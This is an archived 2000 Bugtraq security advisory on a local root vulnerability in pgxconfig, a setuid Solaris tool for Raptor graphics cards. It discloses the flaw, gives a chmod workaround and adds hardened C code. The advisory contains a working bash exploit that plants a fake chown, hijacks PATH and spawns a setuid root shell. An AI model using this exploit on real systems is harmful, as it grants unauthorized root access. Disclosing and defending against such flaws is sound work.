012.txt
Posted Aug 2, 2000
Authored by Suid | Site suid.kg

Pgxconfig is a Raptor graphics card configuration tool for Solaris which has multiple local vulnerabilities. The environment is not sanitized and root privileges are not dropped, allowing commands to be run as root. Local root exploit included.

tags | exploit, local, root, vulnerability
systems | solaris
SHA-256 | c672d208fcfc0115d16c23ed363ad4e7466f870b510a0b15f6d338ba4c585b0c

From owner-bugtraq@SECURITYFOCUS.COM  Wed Aug  2 11:08:46 2000
Return-Path: <owner-bugtraq@SECURITYFOCUS.COM>
Date: Mon, 2 Aug 0100 11:56:57 +0000
Reply-To: suid@SUID.KG
Sender: Bugtraq List <BUGTRAQ@SECURITYFOCUS.COM>
From: suid@SUID.KG
Subject: Local root compromise in PGX Config Sun Sparc Solaris
To: BUGTRAQ@SECURITYFOCUS.COM

hi guys and gals

yeah, here's something I have had sitting on the shelf until the vendor sent me a
fix. They seem to have done that, so here it is. Drum roll...

--- Start ---

suid@suid.kg - Raptor GFX config tool local root vulnerability

Short Name: PGXCONFIG-SPARC
Software: Raptor GFXtra configuration tool - pgxconfig
URL: http://www.techsource.com
ftp://www.techsource.com/download/gfxtra.OWv101.tar.Z
Version: PGX32 (Raptor GFX) X Window System Support v2.3.1
Platforms:
Sun Solaris:
2.5.1 Sparc
2.6 Sparc
7 Sparc
8 Sparc

Type: Multiple. Lack of environment sanity checks. Insufficient
bounds checking. Insecure use of the /tmp dir.
Date: 04 July 2000

Summary:

Local users can run arbitrary commands as root.

Background:

Raptor GFX cards are PCI accelerated graphics adapters suitable
for use in Sun Sparc systems (among others). The associated driver
and configuration software is distributed for the Sun platform from
the techsource.com website.

Vulnerability:

The configuration tool associated with this product is called
pgxconfig and is installed in /usr/sbin mode 4555 by default.

Extract from pkgmap:
1 d none sbin 0775 root bin
1 s none sbin/GFXconfig=pgxconfig
1 f none sbin/pgxconfig 4555 root bin 105956 42039 934907098

With this command it is possible for any user on the system to
change the openwin configuration. The way this program does
this is using system("cp"); to copy the existing configuration
to a backup before overwriting the configuration with
a new file. Anyway, we all know that Solaris's implementation of
system() does NOT execute processes with root privileges when the user's
uid >= 100. However, this particular version of
pgxconfig does a nice setuid(0); for us. So, while we had euid = 0 from
being executed as a suid root program, we now have uid = 0 and thus
system() will execute whatever it's told to, as root.

In this particular program, system is used badly and two things are
going on.

1. root privileges are not dropped
2. the environment is not sanitised

Without source I can't show you exactly what's going on in there, but the
result is obviously insecure.

It's worth noting here (and demonstrating in the exploit) that the
use of system("cp /whatever /wherever"); isn't the only system()
call worth exploiting. I've used the easiest one in my exploit
below.

Other problems noted but not investigated were multiple command
line options lacking proper bounds checking and predictable temp
file creation. It would be a good idea for the vendor to
perform a complete audit on this product.

Exploit:
---------------------------CUT---------------------------
#!/usr/local/bin/bash

# TechSource Raptor GFX configurator root exploit
# suid@suid.kg

# unfortunately a compiler must be installed to use this example
# exploit. however there's a million ways around this you know

# on my system, gcc isn't in my path
PATH=$PATH:/usr/local/bin

# build a little prog nothing new here folks
echo '#include<stdio.h>' > ./x.c
echo 'int main(void) { setuid(0); setgid(0); execl
("/bin/sh", "/bin/sh", "-i",0);}' >> ./x.c
gcc x.c -o foobar
rm -f ./x.c

# build a substitute chown command. i much prefer this over
# regular chown
echo "#!/bin/sh" > chown
echo "/usr/bin/chown root ./foobar" >> chown
echo "/usr/bin/chmod 4755 ./foobar" >> chown
chmod 0755 chown

# oooh look its the magical fairy path variable
export PATH=.:$PATH

# heres one way to skin a cat
# (there's more, some need valid devices. exercise for the readers)
/usr/sbin/pgxconfig -i
rm -f chown

./foobar

----------------------------END--------------------------

Fix:

No source, no fix. A workaround is:

Disable /usr/sbin/pgxconfig or /usr/sbin/GFXconfig (or both)
or at least remove the suid bit.

# chmod 0 /usr/sbin/pgxconfig

or

# chmod 0511 /usr/sbin/pgxconfig

Until your vendor can issue a fix.

Greets:

duke - r0x j00r s0x
cr - m3mb3r 0f t4sk f0rc3 el1t3-p0rn-k1ngz
yowie - elite greet wh0re
ratcorpse + par - congrats dudes
anyone i met at defcon 8 / black hat briefings

Thumbs Down:

Network Solutions - assholes

http://www.suid.edu/advisories/012.txt

--- EOF ---
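The advisory names two root causes in the setuid tool: the caller's PATH reaches system() unsanitised, and setuid(0) turns the effective root into a real root. The C below is an added example, not code from the advisory or from the vendor's pgxconfig, showing the hardened counterpart with hypothetical function names: `path_is_safe` rejects a PATH carrying empty or relative entries such as the `.` the exploit prepends, `copy_with_fixed_env` does the backup copy through execve with an absolute program path and a fixed environment instead of system(), and `drop_privileges` returns to the invoking user's real ids rather than raising them. It assumes /bin/cp exists on the host.

```c
/* Hardened pattern for a setuid helper that must copy a config file. */
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>

/* Reject a PATH with an empty element, ".", or any non-absolute entry:
 * such a PATH lets the caller plant a fake "cp" or "chown". */
int path_is_safe(const char *path)
{
    const char *p = path;
    if (path == NULL || *path == '\0')
        return 0;
    for (;;) {
        const char *end = strchr(p, ':');
        size_t len = end ? (size_t)(end - p) : strlen(p);
        if (len == 0 || p[0] != '/')      /* "" and "." both fail here */
            return 0;
        if (end == NULL)
            return 1;
        p = end + 1;
    }
}

/* Copy src to dst via fork/execve with an absolute program path and a
 * fixed environment: no /bin/sh, no inherited PATH or IFS. Returns the
 * child's exit status, or -1 on fork/exec/wait failure (assumes /bin/cp). */
int copy_with_fixed_env(const char *src, const char *dst)
{
    char *const argv[] = { "/bin/cp", "-p", (char *)src, (char *)dst, NULL };
    char *const envp[] = { "PATH=/usr/bin:/bin", NULL };
    int status;
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        execve(argv[0], argv, envp);
        _exit(127);                        /* exec failed */
    }
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

/* Permanently drop to the invoking user's real ids once the privileged
 * work is done; the advisory's tool did the opposite with setuid(0). */
int drop_privileges(void)
{
    if (setgid(getgid()) != 0 || setuid(getuid()) != 0)
        return -1;
    return (geteuid() == getuid() && getegid() == getgid()) ? 0 : -1;
}
```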
